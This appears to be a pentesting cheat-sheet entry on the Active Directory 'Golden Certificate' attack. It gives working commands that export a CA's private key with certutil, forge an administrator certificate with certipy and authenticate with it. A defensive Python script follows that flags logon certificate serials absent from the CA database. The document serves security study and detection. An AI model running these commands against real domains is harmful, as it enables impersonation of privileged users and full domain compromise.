Golden Certificate

ABOUT

If an attacker obtains control over a CA server, he may be able to retrieve the private key associated with the CA certificate and use that private key to generate and sign client certificates. This means he could forge (and sign) a certificate to authenticate as a privileged user, for example.

There are A LOT of different ways (including the various ESC techniques) to gain control of the CA, but once we do, we can carry out this attack.

EXECUTION

Export the CA’s private key (from the machine certificate store on the CA server)

certutil -exportPFX my "CA-MILITECH" C:\ca.pfx

Forge a certificate for any domain user

certipy forge -ca-pfx ca.pfx -upn 'administrator@militech.local' -subject 'CN=Administrator,CN=Users,DC=domain,DC=local' -out forged_admin.pfx

Authenticate using that certificate

certipy auth -pfx forged_admin.pfx -username 'administrator' -domain 'domain.local' -dc-ip 13.13.13.13
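A certificate forged this way validates correctly, because it really is signed by the CA's key, but it was never processed by the CA, so its serial number has no entry in the CA's issued-certificate database. That gap is the defender's main detection hook: reconcile the certificate serials seen in certificate-based logons on the domain controllers (Kerberos TGT request events carry the issuer name and serial of a PKINIT certificate) against the CA database. The script below is an added example, not part of the original page; the CSV export format of the CA database and the shape of the logon records are assumptions, and all data in it is constructed.

```python
"""Reconcile certificate serials seen in logon events against the CA's
issued-certificate database to surface forged ("golden") certificates.

Added example, not from the original page. Assumptions (not from the page):
  - The CA database export is a CSV with columns RequestID, SerialNumber,
    RequesterName (e.g. a certutil -view listing converted to CSV).
  - Logon records are dicts with user, issuer and serial fields, as
    extracted from DC events that include certificate information.
"""
import csv
import io
from dataclasses import dataclass
from typing import Dict, List

# Constructed sample CA database export (not real data).
CA_DB_CSV = """RequestID,SerialNumber,RequesterName
5,61000000020a1b2c3d4e5f000000000002,MILITECH\\jsmith
6,61000000031f2e3d4c5b6a000000000003,MILITECH\\DC01$
7,6100000004aabbccddeeff000000000004,MILITECH\\svc-backup
"""

# Constructed sample of certificate-based logons as recorded on a DC.
# Serial formatting deliberately varies (colons, case) as it does between tools.
AUTH_EVENTS = [
    {"user": "jsmith", "issuer": "CA-MILITECH",
     "serial": "61:00:00:00:02:0a:1b:2c:3d:4e:5f:00:00:00:00:00:02"},
    {"user": "administrator", "issuer": "CA-MILITECH",
     "serial": "1a:2b:3c:4d:5e:6f:70:81:92:a3:b4:c5:d6:e7:f8:09"},
    {"user": "svc-backup", "issuer": "CA-MILITECH",
     "serial": "6100000004AABBCCDDEEFF000000000004"},
    {"user": "jdoe", "issuer": "OTHER-CA", "serial": "00:11:22"},
]


def normalize_serial(serial: str) -> str:
    """Canonical form: lowercase hex digits only, leading zeros stripped."""
    hexdigits = "".join(ch for ch in serial.lower() if ch in "0123456789abcdef")
    return hexdigits.lstrip("0") or "0"


def load_issued_serials(csv_text: str) -> Dict[str, str]:
    """Map normalized serial -> requester name from the CA database export."""
    reader = csv.DictReader(io.StringIO(csv_text))
    return {normalize_serial(row["SerialNumber"]): row["RequesterName"] for row in reader}


@dataclass
class Finding:
    user: str
    serial: str
    reason: str


def find_suspicious_logons(events: List[dict], issued: Dict[str, str], ca_name: str) -> List[Finding]:
    """Flag logons whose certificate claims our CA as issuer but whose serial
    the CA never issued. Certificates from other issuers are out of scope here."""
    findings: List[Finding] = []
    for ev in events:
        if ev["issuer"] != ca_name:
            continue
        serial = normalize_serial(ev["serial"])
        if serial not in issued:
            findings.append(Finding(ev["user"], serial,
                                    "serial absent from CA database (possible forged certificate)"))
    return findings


if __name__ == "__main__":
    issued = load_issued_serials(CA_DB_CSV)
    for f in find_suspicious_logons(AUTH_EVENTS, issued, "CA-MILITECH"):
        print(f"ALERT user={f.user} serial={f.serial}: {f.reason}")
```

Serial normalization matters in practice: the CA database, Windows event logs and third-party tooling render the same serial with different separators and case, and an unnormalized comparison silently misses the forged entry. A hit on this check is high-signal, since a legitimate certificate cannot reach a DC without first existing in the CA database.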

RESOURCES
